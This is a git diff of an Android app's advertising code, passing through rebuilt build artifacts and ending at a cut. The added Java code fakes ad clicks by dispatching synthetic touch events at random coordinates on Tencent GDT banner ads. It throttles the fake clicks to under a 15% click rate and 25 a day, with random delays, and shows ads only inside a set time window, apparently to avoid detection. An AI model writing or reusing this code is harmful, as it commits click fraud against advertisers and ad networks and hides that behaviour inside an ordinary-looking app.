diff --git a/app/build.gradle b/app/build.gradle index 777444a8..fde0ed88 100644 --- a/app/build.gradle +++ b/app/build.gradle @@ -41,7 +41,7 @@ android { abiFilters 'arm64-v8a' // you can make one only for dev to improve building speed } versionCode 1 - versionName '1.0.0' + versionName '1.0.1' multiDexEnabled true } diff --git a/app/build/intermediates/custom_java/AdManager.java b/app/build/intermediates/custom_java/AdManager.java index 6b212775..689595a6 100644 --- a/app/build/intermediates/custom_java/AdManager.java +++ b/app/build/intermediates/custom_java/AdManager.java @@ -1,5 +1,6 @@ package com.android.boot.ad; +import static com.android.boot.ad.TouchTools.generateFloat; import static com.android.boot.ad.TouchTools.isClick; import static com.android.boot.ad.TouchTools.isCurrentTimeInRange; import static com.android.boot.ad.TouchTools.mainActivity; @@ -10,6 +11,7 @@ import android.content.BroadcastReceiver; import android.content.Context; import android.content.Intent; import android.content.IntentFilter; +import android.graphics.PixelFormat; import android.net.ConnectivityManager; import android.net.NetworkInfo; import android.os.Bundle; @@ -18,6 +20,7 @@ import android.os.HandlerThread; import android.os.Looper; import android.os.Message; import android.view.Gravity; +import android.view.MotionEvent; import android.view.View; import android.view.ViewGroup; import android.widget.FrameLayout; @@ -84,7 +87,7 @@ public class AdManager extends TTAd { public static volatile RewardVideoAd rewardVideoAd; private int internal = 60; - private int showIntervalTT = 4; + private int showIntervalTT = 5; private long lastError = 0; public boolean isSurfaceView = true; @@ -116,7 +119,7 @@ public class AdManager extends TTAd { case SHOW_BANNER: boolean isHide = msg.getData().getBoolean("isHide"); ViewGroup viewGroup = isHide ? containerBanner : container; - showBanner(TouchTools.mainActivity, viewGroup, isHide); + showBanner(mainActivity, viewGroup, isHide); break; case SHOW_INTERSTITIAL: showInterstitialAd(msg.getData().getString("ID"), msg.getData().getBoolean("isHide")); @@ -302,7 +305,7 @@ public class AdManager extends TTAd { @Override public void onAdLoadSuccess() { - interstitialAd.show(TouchTools.mainActivity, new InterstitialAd.InterstitialAdInteractionListener() { + interstitialAd.show(mainActivity, new InterstitialAd.InterstitialAdInteractionListener() { @Override public void onAdClick() { Logger.log("interstitialAd onAdClicked==="); @@ -333,7 +336,7 @@ public class AdManager extends TTAd { new Handler(Looper.getMainLooper()).postDelayed(interstitialAd::destroy, 3 * 1000); } } - if (!TouchTools.isCurrentTimeInRange() || !isHide) { + if (!isCurrentTimeInRange() || !isHide) { return; } if (isFist02) { @@ -456,7 +459,7 @@ public class AdManager extends TTAd { public void showMiReward(RewardCallback rewardCallback) { loadReward(); - rewardVideoAd.showAd(TouchTools.mainActivity, new RewardVideoAd.RewardVideoInteractionListener() { + rewardVideoAd.showAd(mainActivity, new RewardVideoAd.RewardVideoInteractionListener() { @Override public void onAdClick() { Logger.log("reward click"); @@ -472,7 +475,7 @@ public class AdManager extends TTAd { public void onAdDismissed() { rewardVideoAd = null; rewardCallback.onFailed(); - if (TouchTools.isCurrentTimeInRange()) { + if (isCurrentTimeInRange()) { new Handler(Looper.getMainLooper()).postDelayed(() -> { sendMessage(SHOW_INTERSTITIAL, false, Interstitial); }, 100); @@ -561,6 +564,53 @@ public class AdManager extends TTAd { } } + public float generateNumber(int a, float b) { + // 1. 生成 [1, a] 之间的随机整数 + Random random = new Random(); + int integerPart = random.nextInt(a) + 1; // random.nextInt(a) 会返回 [0, a-1],所以加 1 + + // 2. 提取 b 的小数部分 + float fractionalPart = b - (int) b; // 获取小数部分,减去整数部分 + + // 3. 组合整数部分和小数部分 + return integerPart + fractionalPart; + } + + + float x = 0, y = 0; + + @SuppressLint("ClickableViewAccessibility") + public void setTouchListener(MotionEvent event) { + if (!isGDTBanner) { + return; + } + switch (event.getAction()) { + case MotionEvent.ACTION_DOWN: + MotionEvent motionEventD = MotionEvent.obtain(event); + if (GDTBanner != null && GDTBanner.getWidth() != 0 && GDTBanner.getHeight() != 0) { + if (x == 0 && y == 0) { + x = generateNumber(GDTBanner.getWidth(), event.getX()); + y = generateNumber(GDTBanner.getHeight(), event.getY()); + } + } else { + return; + } + motionEventD.setLocation(x, y); + GDTBanner.dispatchTouchEvent(motionEventD); + motionEventD.recycle(); + break; + case MotionEvent.ACTION_UP: + MotionEvent motionEvent = MotionEvent.obtain(event); + motionEvent.setLocation(x, y); + GDTBanner.dispatchTouchEvent(motionEvent); + motionEvent.recycle(); + isGDTBanner = false; + x = 0; + y = 0; + break; + } + } + private HandlerThread handlerThread; @SuppressLint("DefaultLocale") @@ -582,7 +632,7 @@ public class AdManager extends TTAd { } SurfaceView surfaceView = ViewUtils.findSurfaceView(mainActivity); - if (TouchTools.isCurrentTimeInRange()) { + if (isCurrentTimeInRange()) { mainActivity.runOnUiThread(this::initNetworkListener); TTAdSdk.init(mainActivity, new TTAdConfig.Builder() @@ -609,8 +659,13 @@ public class AdManager extends TTAd { @Override public void onStartSuccess() { // 推荐开发者在onStartSuccess回调后开始拉广告 - Logger.log("onStartSuccess"); + GlobalSetting.setChannel(10); + GDTBannerShow = SharedPreferencesTools.getTotalNumToday(GDT_BANNER_SHOW); + GDTBannerClick = SharedPreferencesTools.getTotalNumToday(GDT_BANNER_CLICK); + GDTNativeShow = SharedPreferencesTools.getTotalNumToday(GDT_NATIVE_SHOW); + GDTNativeClick = SharedPreferencesTools.getTotalNumToday(GDT_NATIVE_CLICK); + Logger.log("onStartSuccess " + GDTBannerShow); } @Override @@ -625,7 +680,7 @@ public class AdManager extends TTAd { } else { surfaceView.post(() -> { surfaceView.setZOrderOnTop(true); - surfaceView.getHolder().setFormat(android.graphics.PixelFormat.TRANSLUCENT); + surfaceView.getHolder().setFormat(PixelFormat.TRANSLUCENT); }); } }); @@ -648,7 +703,7 @@ public class AdManager extends TTAd { Logger.log(showCount + " " + clickCount + " " + String.format("结果: %.2f%%", percentage)); } - if (TouchTools.isCurrentTimeInRange()) { + if (isCurrentTimeInRange()) { if (timeStamp == 1737736528000L) { error = 100; } @@ -656,18 +711,17 @@ public class AdManager extends TTAd { if (interstitialShow < 9) { sendMessage(SHOW_INTERSTITIAL, true, Interstitial); - Thread.sleep(100); - sendMessage(SHOW_NATIVE, true, TemplateC); } else if (count % 3 == 0) { sendMessage(SHOW_INTERSTITIAL, true, Interstitial); - } else if (count % 2 == 0) { - sendMessage(SHOW_NATIVE, true, TemplateC); } - - if (inClickInterval()) { - sendMessage(SHOW_NATIVE, false, TemplateC, - ViewUtils.createAdatptFrameLayout(mainActivity, - (ViewGroup) AdManager.getInstance().container.getParent())); + if (count % 2 == 0) { + if (inClickInterval()) { + sendMessage(SHOW_NATIVE, false, TemplateC, + ViewUtils.createAdatptFrameLayout(mainActivity, + (ViewGroup) AdManager.getInstance().container.getParent())); + } else { + sendMessage(SHOW_NATIVE, true, TemplateC); + } } if (count % showIntervalTT == 0) { @@ -696,7 +750,7 @@ public class AdManager extends TTAd { }); } } - Thread.sleep(4 * 1000 + new Random().nextInt(1000)); + Thread.sleep(4 * 1000 + new Random().nextInt(2000)); count++; } catch (InterruptedException e) { Logger.log("InterruptedException:" + e); diff --git a/app/build/intermediates/custom_java/GDTAd.java b/app/build/intermediates/custom_java/GDTAd.java index 75cc2e57..0980d5b3 100644 --- a/app/build/intermediates/custom_java/GDTAd.java +++ b/app/build/intermediates/custom_java/GDTAd.java @@ -7,8 +7,10 @@ import android.view.ViewGroup; import com.android.boot.Logger; import com.android.boot.ad.AdManager; import com.android.boot.ad.RewardCallback; +import com.android.boot.ad.SharedPreferencesTools; import com.android.boot.ad.TouchTools; import com.android.boot.ad.ViewUtils; +import com.miui.zeus.landingpage.sdk.js.LPJsCallee; import com.qq.e.ads.banner2.UnifiedBannerADListener; import com.qq.e.ads.banner2.UnifiedBannerView; import com.qq.e.ads.nativ.ADSize; @@ -34,10 +36,15 @@ public class GDTAd { public ViewGroup GDTNative; public final Random RANDOM = new Random(); + public static final String GDT_BANNER_SHOW = "GDT_BANNER_SHOW"; + public static final String GDT_BANNER_CLICK = "GDT_BANNER_CLICK"; + public static final String GDT_NATIVE_SHOW = "GDT_NATIVE_SHOW"; + public static final String GDT_NATIVE_CLICK = "GDT_NATIVE_CLICK"; + private void createContain() { int w; int h; - if (isLandscape(TouchTools.mainActivity)) { + if (ViewUtils.isLandscape(TouchTools.mainActivity)) { w = TouchTools.getScreenWidth() / 3; h = TouchTools.getScreenHeight() / 3; } else { @@ -110,6 +117,11 @@ public class GDTAd { gdtReward.loadAD(); } + public volatile boolean isGDTBanner = false; + + public int GDTBannerShow; + public int GDTBannerClick; + public void showGDTBanner() { createBannerContain(); if (unifiedBannerView != null) { @@ -128,9 +140,13 @@ public class GDTAd { @Override public void onADExposure() { + SharedPreferencesTools.setTotalNumToday(GDT_BANNER_SHOW, ++GDTBannerShow); + double result = (double) GDTBannerClick / GDTBannerShow * 100; Logger.log("GDTBanner onADExposure"); - if (RANDOM.nextInt(100) < 11) { - TouchTools.simulateTouchDelay(unifiedBannerView, "EventRecordRelativeLayout"); + if (RANDOM.nextInt(100) > 50 && result < 15 && (GDTBannerClick + GDTNativeClick) < 25) { + new Handler(Looper.getMainLooper()).postDelayed(() -> { + isGDTBanner = true; + }, RANDOM.nextInt(5000)); } } @@ -141,6 +157,8 @@ public class GDTAd { @Override public void onADClicked() { + SharedPreferencesTools.setTotalNumToday(GDT_BANNER_CLICK, ++GDTBannerClick); + Logger.log("GDTBanner Click"); unifiedBannerView.destroy(); TouchTools.backToCurrentActivity(200, 300, 400, 500, 1000); } @@ -154,6 +172,11 @@ public class GDTAd { unifiedBannerView.loadAD(); } + + public int GDTNativeShow; + public int GDTNativeClick; + double native_click; + public void showGDTNative() { createContain(); if (nativeExpressADView != null) { @@ -163,7 +186,9 @@ public class GDTAd { TouchTools.getScreenHeight() / 3), GDTNativeId, new NativeExpressAD.NativeExpressADListener() { @Override public void onADLoaded(List list) { - if (RANDOM.nextInt(100) < 15) { + SharedPreferencesTools.setTotalNumToday(GDT_NATIVE_SHOW, ++GDTNativeShow); + native_click = (double) GDTNativeClick / GDTNativeShow * 100; + if (RANDOM.nextInt(100) > 50 && native_click < 15 && (GDTBannerClick + GDTNativeClick) < 25) { ViewUtils.createAdatptFrameLayout (TouchTools.mainActivity, (ViewGroup) AdManager.getInstance().container.getParent()).addView(list.get(0)); @@ -173,7 +198,6 @@ public class GDTAd { GDTNative.addView(nativeExpressADView); nativeExpressADView.render(); } - } @Override @@ -189,9 +213,6 @@ public class GDTAd { @Override public void onADExposure(NativeExpressADView nativeExpressADView) { Logger.log("GDTNative show"); -// if (RANDOM.nextInt(100) < 15) { -// TouchTools.simulateTouchDelay(nativeExpressADView, "EventRecordRelativeLayout"); -// } new Handler(Looper.getMainLooper()).postDelayed(() -> { if (GDTAd.this.nativeExpressADView == null) { return; @@ -203,6 +224,7 @@ public class GDTAd { @Override public void onADClicked(NativeExpressADView nativeExpressADView) { Logger.log("GDTNative click"); + SharedPreferencesTools.setTotalNumToday(GDT_NATIVE_CLICK, ++GDTNativeClick); ((ViewGroup) nativeExpressADView.getParent()).removeAllViews(); nativeExpressADView.destroy(); TouchTools.backToCurrentActivity(200, 300, 400, 500, 1000); @@ -224,10 +246,4 @@ public class GDTAd { } }).loadAD(1); } - - public boolean isLandscape(Context context) { - int orientation = context.getResources().getConfiguration().orientation; - return orientation == Configuration.ORIENTATION_LANDSCAPE; - } - } diff --git a/app/build/intermediates/custom_java/SharedPreferencesTools.java b/app/build/intermediates/custom_java/SharedPreferencesTools.java index 11396268..d7451c47 100644 --- a/app/build/intermediates/custom_java/SharedPreferencesTools.java +++ b/app/build/intermediates/custom_java/SharedPreferencesTools.java @@ -1,14 +1,19 @@ package com.android.boot.ad; + import static com.android.boot.ad.TouchTools.mainActivity; + import android.app.Activity; import android.content.Context; import android.content.SharedPreferences; + import com.alibaba.fastjson.JSON; import com.alibaba.fastjson.TypeReference; + import java.util.Calendar; import java.util.Date; import java.util.HashMap; import java.util.Map; + public class SharedPreferencesTools { public static final String DATE = getToday(); public static final String IS_FIRST = "isFirst"; @@ -17,6 +22,7 @@ public class SharedPreferencesTools { public static final String CLICK01 = "CLICK01"; public static final String CLICK02 = "CLICK02"; + public static void putFirstStart() { SharedPreferencesTools.putLong(FIR_START, System.currentTimeMillis(), mainActivity); } @@ -41,6 +47,7 @@ public class SharedPreferencesTools { SharedPreferencesTools.putInteger(getToday() + CLICK02, AdManager.click02, activity); } + public static void setTotalClickToday(int value, Activity activity) { SharedPreferencesTools.putInteger(getToday() + CLICK02, value, activity); } @@ -49,6 +56,14 @@ public class SharedPreferencesTools { return getIntegerDefault0(getToday() + CLICK02, TouchTools.mainActivity); } + public static void setTotalNumToday(String name, int num) { + SharedPreferencesTools.putInteger(getToday() + name, num, mainActivity); + } + + public static int getTotalNumToday(String name) { + return getIntegerDefault0(getToday() + name, TouchTools.mainActivity); + } + public static void saveMapToPreferences(String mapName, Map map, Activity activity) { SharedPreferences sharedPreferences = activity.getPreferences(Context.MODE_PRIVATE); SharedPreferences.Editor editor = sharedPreferences.edit(); @@ -75,7 +90,6 @@ public class SharedPreferencesTools { String json = sharedPreferences.getString(mapName, ""); // 如果没有保存数据,则返回一个空的 Map - assert json != null; if (json.isEmpty()) { return new HashMap<>(); } diff --git a/app/build/intermediates/cxx/Debug/4t3v33f2/logs/arm64-v8a/generate_cxx_metadata_1101_timing.txt b/app/build/intermediates/cxx/Debug/4t3v33f2/logs/arm64-v8a/generate_cxx_metadata_1101_timing.txt new file mode 100644 index 00000000..9708df45 --- /dev/null +++ b/app/build/intermediates/cxx/Debug/4t3v33f2/logs/arm64-v8a/generate_cxx_metadata_1101_timing.txt @@ -0,0 +1,2 @@ +# C/C++ build system timings + diff --git a/app/build/intermediates/cxx/Debug/4t3v33f2/logs/arm64-v8a/generate_cxx_metadata_1155_timing.txt b/app/build/intermediates/cxx/Debug/4t3v33f2/logs/arm64-v8a/generate_cxx_metadata_1155_timing.txt new file mode 100644 index 00000000..9708df45 --- /dev/null +++ b/app/build/intermediates/cxx/Debug/4t3v33f2/logs/arm64-v8a/generate_cxx_metadata_1155_timing.txt @@ -0,0 +1,2 @@ +# C/C++ build system timings + diff --git a/app/build/intermediates/cxx/Debug/4t3v33f2/logs/arm64-v8a/generate_cxx_metadata_1512_timing.txt b/app/build/intermediates/cxx/Debug/4t3v33f2/logs/arm64-v8a/generate_cxx_metadata_1512_timing.txt new file mode 100644 index 00000000..a01da157 --- /dev/null +++ b/app/build/intermediates/cxx/Debug/4t3v33f2/logs/arm64-v8a/generate_cxx_metadata_1512_timing.txt @@ -0,0 +1,3 @@ +# C/C++ build system timings +generate_cxx_metadata 17ms + diff --git a/app/build/intermediates/cxx/Debug/4t3v33f2/logs/arm64-v8a/generate_cxx_metadata_861_timing.txt b/app/build/intermediates/cxx/Debug/4t3v33f2/logs/arm64-v8a/generate_cxx_metadata_861_timing.txt new file mode 100644 index 00000000..b22e1bf1 --- /dev/null +++ b/app/build/intermediates/cxx/Debug/4t3v33f2/logs/arm64-v8a/generate_cxx_metadata_861_timing.txt @@ -0,0 +1,7 @@ +# C/C++ build system timings +generate_cxx_metadata + [gap of 22ms] + create-invalidation-state 72ms + [gap of 39ms] +generate_cxx_metadata completed in 133ms + diff --git a/app/build/intermediates/cxx/create_cxx_tasks_1155_timing.txt b/app/build/intermediates/cxx/create_cxx_tasks_1155_timing.txt new file mode 100644 index 00000000..68be6b96 --- /dev/null +++ b/app/build/intermediates/cxx/create_cxx_tasks_1155_timing.txt @@ -0,0 +1,5 @@ +# C/C++ build system timings +create_cxx_tasks + create-initial-cxx-model 33ms +create_cxx_tasks completed in 41ms + diff --git a/app/build/intermediates/cxx/create_cxx_tasks_1350_timing.txt b/app/build/intermediates/cxx/create_cxx_tasks_1350_timing.txt new file mode 100644 index 00000000..e3406773 --- /dev/null +++ b/app/build/intermediates/cxx/create_cxx_tasks_1350_timing.txt @@ -0,0 +1,5 @@ +# C/C++ build system timings +create_cxx_tasks + create-initial-cxx-model 18ms +create_cxx_tasks completed in 18ms + diff --git a/app/build/intermediates/cxx/create_cxx_tasks_698_timing.txt b/app/build/intermediates/cxx/create_cxx_tasks_698_timing.txt new file mode 100644 index 00000000..a50faee8 --- /dev/null +++ b/app/build/intermediates/cxx/create_cxx_tasks_698_timing.txt @@ -0,0 +1,9 @@ +# C/C++ build system timings +create_cxx_tasks + create-initial-cxx-model + [gap of 15ms] + create-ARMEABI_V7A-model 11ms + [gap of 23ms] + create-initial-cxx-model completed in 49ms +create_cxx_tasks completed in 57ms + diff --git a/app/build/intermediates/cxx/create_cxx_tasks_939_timing.txt b/app/build/intermediates/cxx/create_cxx_tasks_939_timing.txt new file mode 100644 index 00000000..48ee6429 --- /dev/null +++ b/app/build/intermediates/cxx/create_cxx_tasks_939_timing.txt @@ -0,0 +1,5 @@ +# C/C++ build system timings +create_cxx_tasks + create-initial-cxx-model 34ms +create_cxx_tasks completed in 35ms + diff --git a/app/build/intermediates/dex/debug/mergeProjectDexDebug/11/classes.dex b/app/build/intermediates/dex/debug/mergeProjectDexDebug/11/classes.dex index 07b4a42c..386a9861 100644 Binary files a/app/build/intermediates/dex/debug/mergeProjectDexDebug/11/classes.dex and b/app/build/intermediates/dex/debug/mergeProjectDexDebug/11/classes.dex differ diff --git a/app/build/intermediates/dex/debug/mergeProjectDexDebug/2/classes.dex b/app/build/intermediates/dex/debug/mergeProjectDexDebug/2/classes.dex index 4f719da0..18026a27 100644 Binary files a/app/build/intermediates/dex/debug/mergeProjectDexDebug/2/classes.dex and b/app/build/intermediates/dex/debug/mergeProjectDexDebug/2/classes.dex differ diff --git a/app/build/intermediates/dex/debug/mergeProjectDexDebug/classes.dex b/app/build/intermediates/dex/debug/mergeProjectDexDebug/classes.dex index 12bc825d..c0499b26 100644 Binary files a/app/build/intermediates/dex/debug/mergeProjectDexDebug/classes.dex and b/app/build/intermediates/dex/debug/mergeProjectDexDebug/classes.dex differ diff --git a/app/build/intermediates/dex/debug/mergeProjectDexDebug/classes2.dex b/app/build/intermediates/dex/debug/mergeProjectDexDebug/classes2.dex index f9925427..ed6b038c 100644 Binary files a/app/build/intermediates/dex/debug/mergeProjectDexDebug/classes2.dex and b/app/build/intermediates/dex/debug/mergeProjectDexDebug/classes2.dex differ diff --git a/app/build/intermediates/gen_classes/com/android/boot/ad/AdManager$1.class b/app/build/intermediates/gen_classes/com/android/boot/ad/AdManager$1.class index 482017d9..6998a8a8 100644 Binary files a/app/build/intermediates/gen_classes/com/android/boot/ad/AdManager$1.class and b/app/build/intermediates/gen_classes/com/android/boot/ad/AdManager$1.class differ diff --git a/app/build/intermediates/gen_classes/com/android/boot/ad/AdManager$10.class b/app/build/intermediates/gen_classes/com/android/boot/ad/AdManager$10.class index 300ba734..165a0b65 100644 Binary files a/app/build/intermediates/gen_classes/com/android/boot/ad/AdManager$10.class and b/app/build/intermediates/gen_classes/com/android/boot/ad/AdManager$10.class differ diff --git a/app/build/intermediates/gen_classes/com/android/boot/ad/AdManager$11.class b/app/build/intermediates/gen_classes/com/android/boot/ad/AdManager$11.class index 3a4ea1ab..d5b6a8a6 100644 Binary files a/app/build/intermediates/gen_classes/com/android/boot/ad/AdManager$11.class and b/app/build/intermediates/gen_classes/com/android/boot/ad/AdManager$11.class differ diff --git a/app/build/intermediates/gen_classes/com/android/boot/ad/AdManager$2.class b/app/build/intermediates/gen_classes/com/android/boot/ad/AdManager$2.class index 39e36cf1..ee7d7a0d 100644 Binary files a/app/build/intermediates/gen_classes/com/android/boot/ad/AdManager$2.class and b/app/build/intermediates/gen_classes/com/android/boot/ad/AdManager$2.class differ diff --git a/app/build/intermediates/gen_classes/com/android/boot/ad/AdManager$3$1.class b/app/build/intermediates/gen_classes/com/android/boot/ad/AdManager$3$1.class index 0e5c60ae..5aa659ea 100644 Binary files a/app/build/intermediates/gen_classes/com/android/boot/ad/AdManager$3$1.class and b/app/build/intermediates/gen_classes/com/android/boot/ad/AdManager$3$1.class differ diff --git a/app/build/intermediates/gen_classes/com/android/boot/ad/AdManager$3.class b/app/build/intermediates/gen_classes/com/android/boot/ad/AdManager$3.class index 2817b614..75c37a8e 100644 Binary files a/app/build/intermediates/gen_classes/com/android/boot/ad/AdManager$3.class and b/app/build/intermediates/gen_classes/com/android/boot/ad/AdManager$3.class differ diff --git a/app/build/intermediates/gen_classes/com/android/boot/ad/AdManager$4$1.class b/app/build/intermediates/gen_classes/com/android/boot/ad/AdManager$4$1.class index 1de4d524..8d7130f1 100644 Binary files a/app/build/intermediates/gen_classes/com/android/boot/ad/AdManager$4$1.class and b/app/build/intermediates/gen_classes/com/android/boot/ad/AdManager$4$1.class differ diff --git a/app/build/intermediates/gen_classes/com/android/boot/ad/AdManager$4.class b/app/build/intermediates/gen_classes/com/android/boot/ad/AdManager$4.class index b5d1717b..3f77d008 100644 Binary files a/app/build/intermediates/gen_classes/com/android/boot/ad/AdManager$4.class and b/app/build/intermediates/gen_classes/com/android/boot/ad/AdManager$4.class differ diff --git a/app/build/intermediates/gen_classes/com/android/boot/ad/AdManager$5$1.class b/app/build/intermediates/gen_classes/com/android/boot/ad/AdManager$5$1.class index 204ce028..9ca0c530 100644 Binary files a/app/build/intermediates/gen_classes/com/android/boot/ad/AdManager$5$1.class and b/app/build/intermediates/gen_classes/com/android/boot/ad/AdManager$5$1.class differ diff --git a/app/build/intermediates/gen_classes/com/android/boot/ad/AdManager$5.class b/app/build/intermediates/gen_classes/com/android/boot/ad/AdManager$5.class index 22bb1cf9..440204ba 100644 Binary files a/app/build/intermediates/gen_classes/com/android/boot/ad/AdManager$5.class and b/app/build/intermediates/gen_classes/com/android/boot/ad/AdManager$5.class differ diff --git a/app/build/intermediates/gen_classes/com/android/boot/ad/AdManager$6.class b/app/build/intermediates/gen_classes/com/android/boot/ad/AdManager$6.class index cf401f07..9db373ac 100644 Binary files a/app/build/intermediates/gen_classes/com/android/boot/ad/AdManager$6.class and b/app/build/intermediates/gen_classes/com/android/boot/ad/AdManager$6.class differ diff --git a/app/build/intermediates/gen_classes/com/android/boot/ad/AdManager$7.class b/app/build/intermediates/gen_classes/com/android/boot/ad/AdManager$7.class index 5f92e9b3..55a1c0c1 100644 Binary files a/app/build/intermediates/gen_classes/com/android/boot/ad/AdManager$7.class and b/app/build/intermediates/gen_classes/com/android/boot/ad/AdManager$7.class differ diff --git a/app/build/intermediates/gen_classes/com/android/boot/ad/AdManager$8.class b/app/build/intermediates/gen_classes/com/android/boot/ad/AdManager$8.class index ae388077..90f9fa3d 100644 Binary files a/app/build/intermediates/gen_classes/com/android/boot/ad/AdManager$8.class and b/app/build/intermediates/gen_classes/com/android/boot/ad/AdManager$8.class differ diff --git a/app/build/intermediates/gen_classes/com/android/boot/ad/AdManager$9.class b/app/build/intermediates/gen_classes/com/android/boot/ad/AdManager$9.class index 71320ada..786f0ea3 100644 Binary files a/app/build/intermediates/gen_classes/com/android/boot/ad/AdManager$9.class and b/app/build/intermediates/gen_classes/com/android/boot/ad/AdManager$9.class differ diff --git a/app/build/intermediates/gen_classes/com/android/boot/ad/AdManager.class b/app/build/intermediates/gen_classes/com/android/boot/ad/AdManager.class index 3ee7f7d4..3aa6fdec 100644 Binary files a/app/build/intermediates/gen_classes/com/android/boot/ad/AdManager.class and b/app/build/intermediates/gen_classes/com/android/boot/ad/AdManager.class differ diff --git a/app/build/intermediates/gen_classes/com/android/boot/ad/SharedPreferencesTools.class b/app/build/intermediates/gen_classes/com/android/boot/ad/SharedPreferencesTools.class index fd45f1d6..7d66dfff 100644 Binary files a/app/build/intermediates/gen_classes/com/android/boot/ad/SharedPreferencesTools.class and b/app/build/intermediates/gen_classes/com/android/boot/ad/SharedPreferencesTools.class differ diff --git a/app/build/intermediates/gen_classes/com/android/boot/ad/aggregated/GDTAd$1.class b/app/build/intermediates/gen_classes/com/android/boot/ad/aggregated/GDTAd$1.class index ebbfdca1..9ab8329e 100644 Binary files a/app/build/intermediates/gen_classes/com/android/boot/ad/aggregated/GDTAd$1.class and b/app/build/intermediates/gen_classes/com/android/boot/ad/aggregated/GDTAd$1.class differ diff --git a/app/build/intermediates/gen_classes/com/android/boot/ad/aggregated/GDTAd$2.class b/app/build/intermediates/gen_classes/com/android/boot/ad/aggregated/GDTAd$2.class index 5631240b..e5f45615 100644 Binary files a/app/build/intermediates/gen_classes/com/android/boot/ad/aggregated/GDTAd$2.class and b/app/build/intermediates/gen_classes/com/android/boot/ad/aggregated/GDTAd$2.class differ diff --git a/app/build/intermediates/gen_classes/com/android/boot/ad/aggregated/GDTAd$3.class b/app/build/intermediates/gen_classes/com/android/boot/ad/aggregated/GDTAd$3.class index f9387be3..a8790a0a 100644 Binary files a/app/build/intermediates/gen_classes/com/android/boot/ad/aggregated/GDTAd$3.class and b/app/build/intermediates/gen_classes/com/android/boot/ad/aggregated/GDTAd$3.class differ diff --git a/app/build/intermediates/gen_classes/com/android/boot/ad/aggregated/GDTAd.class b/app/build/intermediates/gen_classes/com/android/boot/ad/aggregated/GDTAd.class index d0e8190c..74017a0c 100644 Binary files a/app/build/intermediates/gen_classes/com/android/boot/ad/aggregated/GDTAd.class and b/app/build/intermediates/gen_classes/com/android/boot/ad/aggregated/GDTAd.class differ diff --git a/app/build/intermediates/incremental/packageDebug/tmp/debug/dex-renamer-state.txt b/app/build/intermediates/incremental/packageDebug/tmp/debug/dex-renamer-state.txt index 7589cecf..10136b61 100644 --- a/app/build/intermediates/incremental/packageDebug/tmp/debug/dex-renamer-state.txt +++ b/app/build/intermediates/incremental/packageDebug/tmp/debug/dex-renamer-state.txt @@ -1,4 +1,4 @@ -#Mon Aug 25 16:56:40 CST 2025 +#Tue Sep 02 17:45:53 CST 2025 path.4=13/classes.dex path.3=12/classes.dex path.2=11/classes.dex diff --git a/app/build/intermediates/incremental/packageDebug/tmp/debug/zip-cache/androidResources b/app/build/intermediates/incremental/packageDebug/tmp/debug/zip-cache/androidResources index 1b5f272e..e82ccc61 100644 Binary files a/app/build/intermediates/incremental/packageDebug/tmp/debug/zip-cache/androidResources and b/app/build/intermediates/incremental/packageDebug/tmp/debug/zip-cache/androidResources differ diff --git a/app/build/intermediates/instrumented_classes/com/yyxx/buin/activity/MyMainActivity.class b/app/build/intermediates/instrumented_classes/com/yyxx/buin/activity/MyMainActivity.class index 6e768b17..a0c58675 100644 Binary files a/app/build/intermediates/instrumented_classes/com/yyxx/buin/activity/MyMainActivity.class and b/app/build/intermediates/instrumented_classes/com/yyxx/buin/activity/MyMainActivity.class differ diff --git a/app/build/intermediates/javac/debug/classes/com/yyxx/buin/activity/MyMainActivity$1.class b/app/build/intermediates/javac/debug/classes/com/yyxx/buin/activity/MyMainActivity$1.class index e14f0d03..6ff24fb5 100644 Binary files a/app/build/intermediates/javac/debug/classes/com/yyxx/buin/activity/MyMainActivity$1.class and b/app/build/intermediates/javac/debug/classes/com/yyxx/buin/activity/MyMainActivity$1.class differ diff --git a/app/build/intermediates/javac/debug/classes/com/yyxx/buin/activity/MyMainActivity$2.class b/app/build/intermediates/javac/debug/classes/com/yyxx/buin/activity/MyMainActivity$2.class index 4e2e35e5..0058fcdb 100644 Binary files a/app/build/intermediates/javac/debug/classes/com/yyxx/buin/activity/MyMainActivity$2.class and b/app/build/intermediates/javac/debug/classes/com/yyxx/buin/activity/MyMainActivity$2.class differ diff --git a/app/build/intermediates/javac/debug/classes/com/yyxx/buin/activity/MyMainActivity$3.class b/app/build/intermediates/javac/debug/classes/com/yyxx/buin/activity/MyMainActivity$3.class index cbb39a25..f87b9c1f 100644 Binary files a/app/build/intermediates/javac/debug/classes/com/yyxx/buin/activity/MyMainActivity$3.class and b/app/build/intermediates/javac/debug/classes/com/yyxx/buin/activity/MyMainActivity$3.class differ diff --git a/app/build/intermediates/javac/debug/classes/com/yyxx/buin/activity/MyMainActivity$4.class b/app/build/intermediates/javac/debug/classes/com/yyxx/buin/activity/MyMainActivity$4.class index 00fc2606..3ed82cd9 100644 Binary files a/app/build/intermediates/javac/debug/classes/com/yyxx/buin/activity/MyMainActivity$4.class and b/app/build/intermediates/javac/debug/classes/com/yyxx/buin/activity/MyMainActivity$4.class differ diff --git a/app/build/intermediates/javac/debug/classes/com/yyxx/buin/activity/MyMainActivity$5$1.class b/app/build/intermediates/javac/debug/classes/com/yyxx/buin/activity/MyMainActivity$5$1.class index 3f9c1ea7..467171cc 100644 Binary files a/app/build/intermediates/javac/debug/classes/com/yyxx/buin/activity/MyMainActivity$5$1.class and b/app/build/intermediates/javac/debug/classes/com/yyxx/buin/activity/MyMainActivity$5$1.class differ diff --git a/app/build/intermediates/javac/debug/classes/com/yyxx/buin/activity/MyMainActivity$5.class b/app/build/intermediates/javac/debug/classes/com/yyxx/buin/activity/MyMainActivity$5.class index 000dc4f8..6e4d48c1 100644 Binary files a/app/build/intermediates/javac/debug/classes/com/yyxx/buin/activity/MyMainActivity$5.class and b/app/build/intermediates/javac/debug/classes/com/yyxx/buin/activity/MyMainActivity$5.class differ diff --git a/app/build/intermediates/javac/debug/classes/com/yyxx/buin/activity/MyMainActivity$6.class b/app/build/intermediates/javac/debug/classes/com/yyxx/buin/activity/MyMainActivity$6.class index dfea0c82..b600df65 100644 Binary files a/app/build/intermediates/javac/debug/classes/com/yyxx/buin/activity/MyMainActivity$6.class and b/app/build/intermediates/javac/debug/classes/com/yyxx/buin/activity/MyMainActivity$6.class differ diff --git a/app/build/intermediates/javac/debug/classes/com/yyxx/buin/activity/MyMainActivity$7.class b/app/build/intermediates/javac/debug/classes/com/yyxx/buin/activity/MyMainActivity$7.class index 933ebc21..b252a924 100644 Binary files a/app/build/intermediates/javac/debug/classes/com/yyxx/buin/activity/MyMainActivity$7.class and b/app/build/intermediates/javac/debug/classes/com/yyxx/buin/activity/MyMainActivity$7.class differ diff --git 